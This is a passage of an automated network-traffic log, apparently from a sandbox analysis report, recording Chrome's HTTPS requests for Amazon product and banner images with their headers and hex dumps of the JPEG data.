                                                                                                                                                                                                                                                                      Last-Modified: Thu, 20 Jul 2023 01:48:56 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 05:38:33 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 478196
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200058-IAD, cache-ewr-kewr1740053-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 02 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 40 d3 0a a6 b0 ce 58 a3 35 e9 d9 15 0d 23 52 46 d1 b7 82 f4 6d 54 70 c4 42 28 6a a3 3d 0f 29 55 f1 f8 ad 3f 34 cc 0c 11 85 50 71 46 73 8a 7e 1b 34 6d 47 ae 9e 0a 8c ac f8 8e 96 46 37 07 0d 11 35 45 45 7d 3c da 9a 49 ab 61 90 c1 d4 95 8c e0 d1 c1 51 2c 95 12 01 b3 c5 dd c8 f8 b1 02 7a d6 fa 2a a3 25 58 59 82 b2 f6 b4 fe 3b c3 4e 73 d2 bb 07 06 45 c1 91 68 95 65 32 ce 75 ae 75 aa 65 9c 9f 6c e4 9a 52 65 cd 1b 7c 3d 65 4f d1 4d 52 4b f7 2c a6 59 4a b2 95 3c 52 cb ed 6a 28 9e 18 22 07 ff 00 58 ff c4 00 27 11 00 02 02 02 00 05 04 02 03 00 00 00 00 00 00 00 01 02 00 03 04 11 05 12 13 20 31 14 16 21 32 15 50 10 22 33 ff da 00 08 01 02 01 01 08 00 fd 8e e6 e6 e6 e6 e6 e6 e6 fb 96 b6 6f 85 f4 56 18 38 75 c7 c0 e0 f9 07 c7 e0 b2 a7 e0 32 a7 b7 f2 a7 b7 f2 a7 b7 b2
                                                                                                                                                                                                                                                                      Data Ascii: @X5#RFmTpB(j=)U?4PqFs~4mGF75EE}<IaQ,z*%XY;NsEhe2uuelRe|=eOMRK,YJ<Rj("X' 1!2P"3oV8u2
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: e1 50 cd d9 e0 86 6e cf 06 b3 b3 c1 1f 82 4d c4 4a 8e e9 aa 34 fd 3d 8e a3 51 0f 98 6d 92 49 d4 ea 75 3a 9d 47 cc ea 3e 67 51 bd 4c 06 03 42 46 07 af 37 d0 c6 15 4b a4 fa a8 58 6a 3d 6d 21 65 08 3e 4b a8 37 9c bd 26 93 b9 04 27 58 9d 09 21 99 24 92 4f 09 e0 f8 54 a9 52 bc 6e 6d a2 f4 66 a4 45 71 4a 3a c1 0b 21 25 90 90 80 93 31 23 c7 d8 59 de c2 fc 82 ce 76 16 6f b0 b3 fd 85 9a ec 7e 40 bf 90 7e 50 bf 84 78 e9 79 2b 72 aa 9b 59 c0 a4 93 cd 22 4b db 68 bd 1b 5b ae 3b b1 08 42 18 5c 08 42 63 09 89 89 88 b9 10 73 07 de 59 6e c5 38 5e db 45 e8 da dd 71 dc 42 10 84 c4 c4 c4 c4 c4 c4 c6 10 b8 74 c5 e3 9b a3 e4 58 5e 68 b7 93 e1 c2 f6 da 2f 46 c6 eb 8f 8a 10 84 c4 c4 c4 c6 13 18 61 3e 08 e3 1c be 4a dd df c1 f2 a2 de 45 f0 22 e6 da 2f 46 c6 eb 91 c5 08 42 62 62
                                                                                                                                                                                                                                                                      Data Ascii: PnMJ4=QmIu:G>gQLBF7KXj=m!e>K7&'X!$OTRnmfEqJ:!%1#Yvo~@~Pxy+rY"Kh[;B\BcsYn8^EqBtX^h/Fa>JE"/FBbb
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC822INData Raw: 69 a6 75 77 30 d4 94 3c 99 9f e9 28 95 08 31 43 f8 0a 52 e8 ec 05 48 77 c2 fb fe 04 aa e2 b9 44 e3 b9 a7 42 f3 81 f4 11 5c 90 bd 03 23 d9 c5 be c1 04 c1 4a d0 62 06 04 1e ce 88 60 ae 08 3e d3 69 6d 53 bc 7a 0d 6a f7 34 e6 33 86 2a 44 38 12 80 53 c7 8a a6 a5 e0 9d 01 0e ff 00 65 8b 52 5f 85 57 64 da 73 95 2e 9d 59 0a bc f8 bb 5e 11 95 9b 25 d7 29 4b cd 77 29 b8 c3 e4 66 22 8a a0 2e f4 97 00 77 0f 3d ad 98 1a b4 88 8b 71 59 7c dc 35 5b 60 3f a8 5f 8b 32 36 2f 60 80 d3 23 10 c3 10 cc 4c f5 cf 09 bc be 88 9f 43 44 3c 23 de cb 69 47 18 3b 57 55 6c 3b 8d 46 f4 61 3a e9 21 8d 48 4d 0e 4a a3 05 c3 b7 24 ba e1 c8 3f 50 bb d5 62 d1 c1 05 75 4b 14 30 29 d7 55 54 b8 4f dd 2e 9a 71 69 52 a2 88 e8 8d 22 30 9d c3 33 a5 9d 5c 3e e4 96 04 6b 7b 5e c1 5d 28 de e1 7e 5e fd
                                                                                                                                                                                                                                                                      Data Ascii: iuw0<(1CRHwDB\#Jb`>imSzj43*D8SeR_Wds.Y^%)Kw)f".w=qY|5[`?_26/`#LCD<#iG;WUl;Fa:!HMJ$?PbuK0)UTO.qiR"03\>k{^](~^


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      75192.168.2.54979518.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4485
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 4d121dae-eb8d-4add-acab-86babb0376d8
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 11:53:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-038,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:53:59 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-038 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Via: 1.1 69b7884048ebe8b1ecf8d8ec9d39c85c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 408491
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: OjTm-b6AxGgJ-BUj-4gVOcxtjQx0Rrnt1DyjRvK56yNx1LU9rSMTLg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC4485INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a8 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 06 08 04 05 07 09 03 10 00 01 03 02 03 05 04 05 09 07 04 03 00 00 00 00 01 00 02 03 04 11 05 21 31 06 07 12 13 41 22 32 51 61 08 14 71 81 b1 23 33 42 52 53 62 91 92 a1 15 17
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1A"2Qaq#3BRSb


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      76192.168.2.549806151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/41C83Jg7PlL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6194
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 442a03a7-90a2-4480-989c-b301bbc0cadc
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 29 Apr 2024 07:14:25 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Mon, 01 Aug 2044 14:43:52 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 706719
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100124-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 03 05 06 07 08 02 01 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ef b2 ce b5 96 b2 d6 72 2e 27 7e 19 49 58 0d 67 2a e9 03 99 5f 0b d5 ef dc 9e 1e 5e 69 62 47 f9 cc 16 a2 ce b3 15 7e 37 40 12 b2 15 91 08 c2 b8 08 75 4d 71 68 e8 49 75 ef 1c 8f 8a c6 38 71 ca 86 6f 0f a8 23 7f 9c 35 b0 cf e1 d8 f5 3c 1a 73 b6 4f 8f 55 90 ad 35 90 20 8b ad b9 75 96 7b 1b 10 3f 05 bf e9 37 f9 1d 3a 11 d5 65 dc ad 90 67 e5 68 b7 f3 0d 54 90 f8 47 8d c8 3c e2 c5 a1 76 f1 ca d9 3c 3e 1e a3 87 56 9b 32 d1 5a 68 00 82 fe 57 5c b9 91 f1 ba 3d 5b 70 ed 97 ea 0a 3e 21 5b 30 e8 6c 55 89 59 53 3e d5 97 37 90 16 43 ed da fc 2f c4 ca 19 d5 61 8e ac 90 b4 9e 33 d3 89 63 7b 0d 5e 05 25 33 33 37 30 ba 73 73 29 36 b2 26 cc b1 3d 18 99 f7 30 da 30 64 69 4d fb 5a 83 3a 20 c2 16 46 fe 45 86 c3 8d 95 95 f8 17 59 3a a1 a1 35 f2 4b e1 16 11 51 3e f4 78 2b 60 b1
                                                                                                                                                                                                                                                                      Data Ascii: r.'~IXg*_^ibG~7@uMqhIu8qo#5<sOU5 u{?7:eghTG<v<>V2ZhW\=[p>![0lUYS>7C/a3c{^%3370ss)6&=00diMZ: FEY:5KQ>x+`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 69 a3 65 43 3e 4a bb cc 67 f7 4a 0f 17 85 f9 58 af 55 96 8e 14 6c bb 2e 68 a8 e6 85 1f 74 a8 84 28 99 f7 50 cd 70 41 0f 90 1a 04 d6 4f a2 38 2e 28 7c b0 59 26 b2 4f 41 0f f2 4f ff c4 00 2b 10 00 02 01 02 04 05 04 03 00 03 00 00 00 00 00 00 01 11 00 21 31 41 51 61 71 81 91 a1 b1 f0 10 30 c1 d1 20 e1 f1 40 60 70 ff da 00 08 01 01 00 01 3f 21 ff 00 78 4a 46 60 83 a8 f2 8b b0 84 7e 3e d0 f9 df 68 47 89 f1 43 93 e7 bc c1 1f 82 0e 1f 8b 79 81 89 af e5 87 24 99 10 99 6e 7c fc 47 db af 8e b7 3f f9 80 1a 43 a2 70 8e 97 71 0a 11 c0 fb cd 56 b2 5b de 81 c2 a2 0f e4 fd 40 1f a5 f5 11 1d 4f 3c 00 fd 9f 71 58 3a c0 2f a2 01 7d 28 05 6e 42 01 d8 39 08 00 cb a4 71 a3 8e 3d 72 0f c3 4e ef 79 6d fc 2a 3a 38 3d a2 80 58 b6 17 17 a0 91 39 15 e6 ec 0a 3e f5 25 82 3d fd d3 63
                                                                                                                                                                                                                                                                      Data Ascii: ieC>JgJXUl.ht(PpAO8.(|Y&OAO+!1AQaq0 @`p?!xJF`~>hGCy$n|G?CpqV[@O<qX:/}(nB9q=rNym*:8=X9>%=c
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 00 03 00 00 00 00 00 01 00 11 21 31 41 51 61 71 81 91 10 30 a1 b1 c1 d1 20 e1 f0 40 60 70 ff da 00 08 01 01 00 01 3f 10 ff 00 bc 72 24 29 f9 48 fb b4 17 ca 93 8e ba 34 ec d7 a4 3a 77 4d 3d 9b f4 fd e4 1f 55 c6 f6 78 c8 7e e8 47 67 bb 3f ee a2 bf e7 ff 00 12 c3 d7 f5 ef a0 ee 9c ea cd f9 85 8a 5a d3 68 ae e6 1e f1 92 f4 35 21 0b 7b 0f 04 36 af e3 1a a2 f6 3e a3 82 ef 80 77 7a c7 8d fa ac 1a 4e ea bf 33 42 ef de 69 70 b4 e7 fe b8 4d 05 f4 2f c4 26 80 e8 09 62 73 22 b8 cb 4d 86 2e 55 51 e8 03 ef 5c 7e eb f5 fc ce 69 b6 9e 86 5c 5f 5b 87 a0 9d 25 50 1c 4b eb 16 41 b3 3c c0 d3 0f c0 d4 af 29 a7 bb 49 16 3f 2d e6 a2 e0 6d 3b ef ca 17 1c fa 1f 45 f5 21 04 ad 4d d2 1b 43 a0 85 dc ae f3 b8 07 cc 6b a0 2a 27 10 30 b7 29 8f 03 9a 7c da 2d d8 77 fa d6 41 05 b8 05 0b
                                                                                                                                                                                                                                                                      Data Ascii: !1AQaq0 @`p?r$)H4:wM=Ux~Gg?Zh5!{6>wzN3BipM/&bs"M.UQ\~i\_[%PKA<)I?-m;E!MCk*'0)|-wA
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC682INData Raw: aa 5d d8 55 13 c8 fc eb fc 56 db b3 59 6d 9d d2 d3 bc 2e 37 ac a3 b4 0b bf 64 fa d9 35 55 66 f8 5b 76 d6 08 08 38 95 0e 28 50 16 20 96 6b 0b a9 63 8f a8 0c b1 12 d4 ed b8 e7 b8 74 97 99 66 b2 46 f2 2b 61 78 a9 bb dc d3 b2 ac 08 6b 83 82 cd 27 91 64 c6 dd ec 61 e5 03 6c 1b 64 ed 45 36 16 35 aa 7c ba 85 9a dd 6b 60 c7 da 8b 62 af 4b 0b 40 29 a6 da 25 a4 98 80 2d 78 5e bd 48 82 e4 40 15 75 e6 c0 0e 95 03 10 13 aa d3 d5 65 e5 16 6e dd eb 77 c1 5f 73 0a 1d 00 fe 51 55 fc dd a1 25 7a 62 2b b5 73 c3 fa 88 e8 9d 58 7f 27 d4 78 8e ad 3c e9 09 06 90 e2 b5 04 d5 d2 57 92 8f b8 b1 69 dd 0f 9d 31 f2 ae f2 f0 82 ec 0d 4e 23 e7 3d 54 59 ba ad fe 2d 04 1d 92 e0 37 d4 1e 28 5d 2b 96 ea 28 1a 41 16 29 d8 d6 78 45 04 1b 10 ba 2b 4f 8e 06 c2 02 84 d1 4c f8 62 c5 d1 48 2b 3e
                                                                                                                                                                                                                                                                      Data Ascii: ]UVYm.7d5Uf[v8(P kctfF+axk'daldE65|k`bK@)%-x^H@uenw_sQU%zb+sX'x<Wi1N#=TY-7(]+(A)xE+OLbH+>


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      77192.168.2.549807151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC471OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4101
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: c1c4643d-6a80-4b97-bca4-3684dbcc3aca
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:38:27 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 429993
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100113-IAD, cache-ewr-kewr1740067-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 ad 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 08 03 04 05 06 07 09 10 00 01 03 02 03 04 06 06 06 07 08 03 00 00 00 00 01 00 02 03 04 11 05 12 21 06 31 41 51 13 22 32 61 92 d1 07 08 17 54 81 91 14 53 71 b1 c1 d2 15 23 42
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1AQ"2aTSq#B
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 22 23 92 07 e6 8d e6 02 65 8c e7 12 75 1f 6d 3a c1 4a 12 1f de 9a 5a fe f4 9f e9 6b f3 ba 4e d2 ec c7 43 a7 d5 38 3a 42 c6 23 64 5d 85 b9 07 be 35 fb 54 68 c7 b6 9f 19 c6 a1 e8 2a 23 b3 0b c3 9e 23 83 a3 e9 1d a0 cc f2 07 58 a6 60 9b 47 8a e0 f1 36 3a 68 07 54 b8 b6 47 53 67 91 85 db f2 bc 8b 85 24 67 95 8c ea bd c0 1e 44 d9 6a 15 7d 1c 0e b0 91 a5 a7 77 58 25 b3 95 6e 7c dd 61 aa 76 7e ed ed f5 51 e7 e9 16 21 a7 11 37 0e 69 8b bd 6b fd 8b 91 e0 fb 59 8d 61 6c 7b 22 61 78 32 39 e0 c9 07 4a 59 23 bb 4f 61 23 47 15 a8 cd 49 57 3b df 24 91 c8 e7 3c 92 e7 16 3a e4 bb 52 4e 9c 4a 90 cc 78 93 56 90 e1 dd aa 70 63 93 8f e4 b9 95 8d 64 95 44 b4 6d a7 d5 45 8f a5 60 85 ee 7c 78 78 0e 3b fb df 62 e0 f8 35 4e 23 83 d4 b2 aa 91 8f 64 8c be bd 19 20 83 a1 04 5a c4 15
                                                                                                                                                                                                                                                                      Data Ascii: "#eum:JZkNC8:B#d]5Th*##X`G6:hTGSg$gDj}wX%n|av~Q!7ikYal{"ax29JY#Oa#GIW;$<:RNJxVpcdDmE`|xx;b5N#d Z
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1345INData Raw: 9f b1 73 0c 6f 14 fa 7c c5 c3 48 d9 a3 07 77 33 de ed e5 6c 7b 57 8b 74 2d fa 1c 67 ac eb 19 0f 21 bc 37 e3 bc ad 08 39 3f 4d 07 fb 1d f2 54 d8 be 29 b5 2c 67 d5 df c2 a8 84 d0 53 94 c5 40 9c 0a 54 c4 b7 42 4d 94 8f 42 10 b3 cb ab a1 21 4a 84 21 53 ba 72 08 b2 4b a1 08 21 79 65 eb 6f 2f 47 b6 c3 f9 2a 4f f9 2f 53 2e bc da f5 a6 c1 df 3e d5 be 61 07 48 d3 49 4c 33 00 0d ad 98 20 62 02 95 ec 94 f8 15 6d 83 46 5d 54 ef 82 8c 87 ab 94 ac dd 14 bd 03 9a f6 e8 41 07 e4 af 06 18 3e a2 5f 93 55 46 e1 f6 fe e6 6f 93 54 aa 9e 39 8e 58 cb 58 d2 0a d6 45 18 63 ae ed 42 cd 1d a9 a9 96 c0 b9 ba 0f aa 8d bd da f5 45 d6 bd 89 6d 9d 59 98 b9 92 01 dd 91 81 bc bb 39 72 ff 00 45 70 68 4f d5 4d f2 6a b5 76 11 19 04 1a 69 09 bf f0 36 ea b6 2c 79 8d 8d cd 78 b9 29 c9 e5 6c 96
                                                                                                                                                                                                                                                                      Data Ascii: so|Hw3l{Wt-g!79?MT),gS@TBMB!J!SrK!yeo/G*O/S.>aHIL3 bmF]TA>_UFoT9XXEcBEmY9rEphOMjvi6,yx)l


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      78192.168.2.549805151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC453OUTGET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Tools_EN_1x._SY116_CB567104843_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
